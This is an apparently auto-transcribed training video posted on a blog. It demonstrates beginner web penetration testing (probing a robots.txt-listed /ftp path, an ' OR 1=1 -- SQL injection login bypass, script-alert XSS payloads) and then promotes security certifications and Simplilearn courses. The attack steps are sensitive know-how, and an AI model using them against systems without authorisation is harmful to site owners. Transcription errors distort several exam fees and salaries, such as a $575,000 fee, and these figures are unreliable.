crawlers search engines and bots will respect this directive and avoid the crawling of the /tp directory it is helping optimize the crawling by excluding unnecessary sensitive path for the security perspective the presence of /fttp in rewards.txt can be a security risk because it is revealing the existence of potentially sensitive directory attackers may manually navigate to the /tp to check for files or vulnerabilities third if we talk about with the respect of penetration testing the FTP entry can serve as a clue for ethical hackers or penetration testers to investigate okay so you can check the / FTP directory for sensitive files like backups configurations or credentials okay now if you want to look for the hidden files so you could use tools like DB okay so you could go for the directory you know enumeration for the same just type db give the link and /tp so you might be able to access some hidden directories under / FTP so I hope so you would have got a brief idea regarding / FTP and do check for these files in a given uh website it’s very very important process of penetration testing now let us finally proceed for the SQL injection so guys SQL injection is a technique which is used to manipulate a website database by injecting malicious SQL code into the input field so the steps involve are as follows so first of all go to the login page so you could see account all over here go click on login now here enter the following user credentials like you could give for username as say 1 okay or you could give any password or you could leave it blank okay now you could see all over here that we have injected a payload 1 equals to 1 or something like this okay so it you can see all over here that I’m not able to login okay so you could see this is been secured now let us give certain other email and let us say provide a password or we could leave it blank so it’s still asking for your password type anything okay uh just login you can see it is telling invalid email or password okay means like we have not registered yet all over here that’s why it’s saying invalid email so let let me explain you what I’m trying to do all over here so suppose the payload which I’m trying to inject suppose as I have written all over here say 1= to 1 okay now this is actually breaking the SQL query logic for example If you are typing select star from users where username equals to this or 1 equals to 1 minus minus and password could be anything okay so this or condition always evaluates true so let me show you so guys you could see here that I’m writing a SQL query something like this okay select star from users where username equals can be anything or it could be 1 equals to minus one and password could be anything so this is kind of a SQL injection where we are trying to put anything malacious inside the you know given code so this or condition 1 equals to 1 always evaluates to true so it is bypassing the authentication so the minus minus sign is used to comment out the rest of the SQL query ignoring the password checks okay now if you successfully log in without valid credentials then you could say the application is vulnerable to SQL injection but you can see all over here that this condition is not happening okay and if you even try to leave out the password it is not showing anything for login so this is actually not vulnerable to SQL injection now let us try to do cross-ite scripting so guys cross-sight scripting or XSS is an attack that injects malicious script into the website which are then executed in the browser of unsuspecting users so the steps to test XSS first you have to identify the input fields okay search bar it could be or a feedback form like on this website and you could enter a payload certain thing like this so first of all let us try to go all over here in the search bar click on inspect okay now we have to find out where the script is written okay so type Ctrl+ F okay so Okay now the script uh Okay now what you would do all over here let us now perform the excss attack so as we have navigated to our web application so we have targeted this input field okay now we are trying to inject okay script alert XSS okay so what you have to do you have to click on right click on this and go to the developers tool okay and then you will uh get screen like this where you have to add script alert accesses now if the alert box pops up okay if it does then it shows that it is vulnerable to the XSS attack so guys as you can see all over here I have inserted this script alert XSS /cript so I’m trying to inject the XSS now if you see a pop-up button like coming all over here then it indicates that this input field is vulnerable to XSS attack so just right click on this and let us see so guys as you can see all over here that I have inserted this script alert accesss now when you right click on this and any pop-up is coming up then it means that this website is vulnerable to excss attack so in this way you can perform exploitation now if you cannot manually insert the tag okay what you can do guys you can modify the existing DOM okay so first of all locate the input field in the developers tool then right click on it and on that input element okay and manually replace the given values press enter to save the changes and check if the script executes so let us right click on this so you can see nothing is happening so it’s all fine now that’s one way you could do it or alternatively what you could do you could go on the console and type the same thing like document.query selector input matt input zero so this is the given form field and the value and inject the excss attack all over here and then if it is applicable trigger the search button programmatically so what you could do you could uh trigger in the next step document.query selector form.submit now if the green if the pop-up appears all over here then we are successfully injecting the XSS attack now if you can’t inject the script okay so this also scenario comes up so first of all inspect the sanitization logic review how the application processes your input some apps escape dangerous characters like these curly braces okay these braces and script so test alternative input fields try other input fields forms or query parameters where your script might work so guys this was a small introduction on pen testing with using various tools present in the Kali Linux cyber security is not just a job it’s a war zone where organizations fight daily to protect their most valuable assets data and systems the stakes have never been higher and the demand for skilled professionals is rapidly growing a trusted survey predicts that millions of cyber security job openings in India alone by next year but here’s the harsh reality most candidates lack the skills and the industry demands this is where certifications comes in you have probably heard people ask why do certifications why not just get a degree wait let me tell you the truth college programs often fail to keep up with the fast changing demands of cyber security industry certifications on the other hand are laser focused on the skills you actually need they are faster more affordable and targeted so whether you’re a fresher or a professional looking to climb up the ladder certifications are your best bet let’s explore the top five certifications that can give you an edge to help you land that dream cyber security job now you might be thinking I’m not from an IT background can certifications really help me or maybe you have graduated with a computer science degree and are wondering why bother with certifications let me explain why certifications are so powerful first if you are from a nonIT background certifications can open doors you never thought possible they provide you with hands-on practical skills that employers value far more than theoretical knowledge for example even if you have never written a single line of code certifications like comt plus security or certified ethical hacker can teach you the foundational skills needed to land your first job in cyber security on the other hand if you’re already a computer science graduate certifications allow you to specialize cyber security is a vast field and employers look for specialists in areas like penetration testing risk management or compliance a certification like CISSP can turn your general degree into a targeted resume that screams expertise here’s why certifications are such a game changer at first it will help you to boost your resume by adding instant credibility showing you have invested in gaining expertise they also align with industry trends ensuring your skills match with current standards they also demonstrate your commitment to your career and give you a competitive edge making you stand out to hiring managers in a crowded job market so now let us explore the top five certifications that you can take your cyber security career to the next level so let’s get started so now let’s begin with our very first certification at the top of the list which is certified information system security professional CISSB widely regarded as the gold standard in cyber security certification it’s offered by IANS it is one of the most respected organizations in this field this certification is very essential for professionals who want to lead cyber security efforts at an enterprise level well CISSP is an comprehensive certification that covers eight key cyber security domains such as risk management security operations and software development security it’s highly designed for experienced professionals and proves you have the expertise to design implement and also manage a rubber cyber security program organizations worldwide trust CISSP certified professionals to handle sensitive security needs talking about the eligibility to qualify you need to at least have five years of professional experience in at least two of the A domains a bachelor’s degree in computer science or any one of the experiences preferred even without full experience you can take the exam and earn the title associate while you complete the required work experience let’s talk about the exam details and cost well the CISSP exam is about six hours long with 250 questions and the cost of the exam is rupees 61,49 Indian rupees and for us it’s around $749 this is one of the fee to register and sit for the certification exam cissp opens doors to senior roles such as chief information security officer who can earn around 76 lakhs year in India and $150,000 plus per year in the US also senior security consultant who can earn around 13 lakhs per year in India and $120,000 per year in the United States well CISSP is more than just a credential it’s a symbol of expertise leadership and trust in the cyber security world for anyone serious about advancing in this field this is the certification you should aim for also if you’re looking for specialized training to a CISSP examination consider simply learn CISSP certification training this is globally acclaimed program and is aligned with the latest IC exam pattern offering comprehensive coverage of all the A domains with live online classes hands-on lab and also expert guidance with features like simulation tools test papers and included CISSP exam voucher simplearn ensures you are exam ready plus their 100% money back exam pass guarantee also adds extra confidence as you work towards elevating your cyber security credit next on our list is CISA which is certified information system auditor a highly respected certification from ISCA focusing on auditing compliance and risk management it’s perfect for professionals responsible for evaluating and improving an organization security framework cisa is recognized worldwide especially in highly regulated industries like finance healthcare and government it demonstrates expertise in identifying vulnerabilities ensuring compliance and improving security controls let’s talk about the eligibility for this certification well to qualify you need to have at least 5 years of work experience in IT audit control or security you also need to have a bachelor’s degree that can wave up to 2 years of this requirement let’s talk about the exam details and cost with this certification well the exam is 4 hours long with 150 questions testing your knowledge of auditing and compliance exam fee is around $47,141 Indian rupees and $575 for a CA members and if you’re not a member of ISACA then you have to pay $62,000 in Indian rupees and $760 for USA let’s talk about the career opportunities and salaries well CISA certified professionals can secure roles like IT audit manager who can earn around 20 lakhs per year in India and $130,000 per year in the United States compliance program manager also can earn around 24 lakhs per year in India and $140,000 per year in the United States with organization increasingly prioritizing governance and compliance CISA has become a critical certification for professionals in these areas it’s must have for those who want to specialize in auditing and risk management also if you want to boost your career in IT auditing and compliance you can consider simply learn CIS certification training as an accredited training partner of ISACA Simple Learn offers comprehensive preparation including live classes by industry experts access to the official ISACA learning kit and simulation test to help you master the 2024 CIS exam alone this training provides you upto-ate curriculum and practical insights to help you excel your career with an exam pass guarantee and flexible learning options simply learn also ensures that you’re fully prepared to achieve CISA certification and advance your professional journey let’s talk about the third certification on the list which is certified information security manager CISM coming at number three this is another certification from IACCA aimed at managers and leaders in cyber security it’s ideal for professionals who want to transition into leadership roles cism focuses on the strategic and managerial aspects of cyber security such as governance incident management and program development it’s valued by organization seeking security leaders who can make informed highle decision let’s talk about the eligibility to qualify you need to have five years of experience in information security management a degree of another relevant certification that can wave up to 2 years of this requirement let’s talk about the exam details and the cost well the exam is 4 hours long with 150 question assessing your strategic thinking and the cost is 47,000 rupees and $575,000 in United States for ISCA members and 62,000 rupees in per Indian currency and for non-members it is around $760,000 cism certified professionals often step into leadership roles such as director of information security who can earn around 37 lakh per year in India and 160,000 per year dollars in the United States data governance manager can earn around 30 lakhs per year in India and $140,000 per year in the United States for those aiming to lead cyber security teams and make strategic decisions CISM provides the credibility and expertise needed to succeed also if you want to elevate your career and leadership role Simple Learn CISM certification training can be your ideal choice as an ICA elite training partner Simplearn provides an learning kit including the IC value review manual QA and exam voucher along with live classes conducted by increders so you can refer to this uh certification by simply learn let’s move on to the fourth number on the list which we have comp eia security plus the perfect entry-level certification for building core cyber security skills it’s a vendor neutral which means it’s recognized across industries and applies to various technologies security plus covers essential topics like network security threat management and compliance it’s designed to give beginners a strong foundation in cyber security and prepare them for real world challenges let’s talk about the eligibility well there are no strict prerequisites but coma recommends having basic IT experience or earning the network plus certification first let’s talk about the exam details and cost the 90-minute exam includes both multiplechoice questions and also performancebased questions the registration fee for the exam is $30,000 rupees and in USD it is around $370 with security plus you can pursue roles like security engineer who can earn around 8.2 lakhs per year in India and $95,000 per year in the United States cloud engineers can earn up to rupees six lakh per year in India and $85,000 per year in the United States security plus is an affordable impactful way to start your cyber security journey making it an excellent choice for beginners also if you’re looking to begin your cyber security career with confidence consider simply learn TI security plus certification training this will also provide you comprehensive coverage of all the exam objectives and focuses on real world applications to prepare you for the industry challenges additionally flexible learning options and 247 assistance makes it an excellent choice for learners worldwide finally we have C which is certified ethical hacker on the list the perfect certification for those who dream of thinking to become a hacker to protect systems offered by EC council this credential focuses on skills needed to become penetration testing and ethical hacking c is a hands-on certification that teaches you to identify vulnerabilities and detect attacks and secure systems it’s a great choice for professionals drawn to ethical hacking and proactive cyber security moving on to the eligibility part to qualify you need to have two years of experience in information security or at least completion of the EC council’s official training program the exam details and the cost is the exam is around 4 hours long with 145 multiple choice questions and the exam fee is 98,000 and $1,199 USD in USD ca certified professionals often work as penetration tester who can earn around average of five lakh per year in India and $85,000 per year in the United States cyber security engineers can earn $7.3 lakh per year in India and $100,000 in the United States c is perfect for professionals who want to specialize in offensive security and ethical hacking it’s an exciting certification that paves the way for dynamic high impact tools also if you are ready to step into the world of ethical hacking then Simply Learn CE V13 certification training is the perfect choice accredited by the AC Council this course includes the official E course where AIdriven tools and exam voucher with hands-on labs live sessions and cutting edge tools simple learn equips you to excel in penetration testing and many more that’s our wonderful course if you have any doubts or question ask them in the comment section below our team of experts will reply you as soon as possible thank you and keep learning with Simply Learn staying ahead in your career requires continuous learning and upskilling whether you’re a student aiming to learn today’s top skills or a working professional looking to advance your career we’ve got you covered explore our impressive catalog of certification programs in cuttingedge domains including data science cloud computing cyber security AI machine learning or digital marketing designed in collaboration with leading universities and top corporations and delivered by industry experts choose any of our programs and set yourself on the path to career success click the link in the description to know more hi there if you like this video subscribe to the SimplyLearn YouTube channel and click here to watch similar videos to nerd up and get certified click here

By Amjad Izhar
Contact: amjad.izhar@gmail.com
https://amjadizhar.blog

Affiliate Disclosure: This blog may contain affiliate links, which means I may earn a small commission if you click on the link and make a purchase. This comes at no additional cost to you. I only recommend products or services that I believe will add value to my readers. Your support helps keep this blog running and allows me to continue providing you with quality content. Thank you for your support!

Category: Ethical Hacking

Ethical Hacking and Penetration Testing with Kali Linux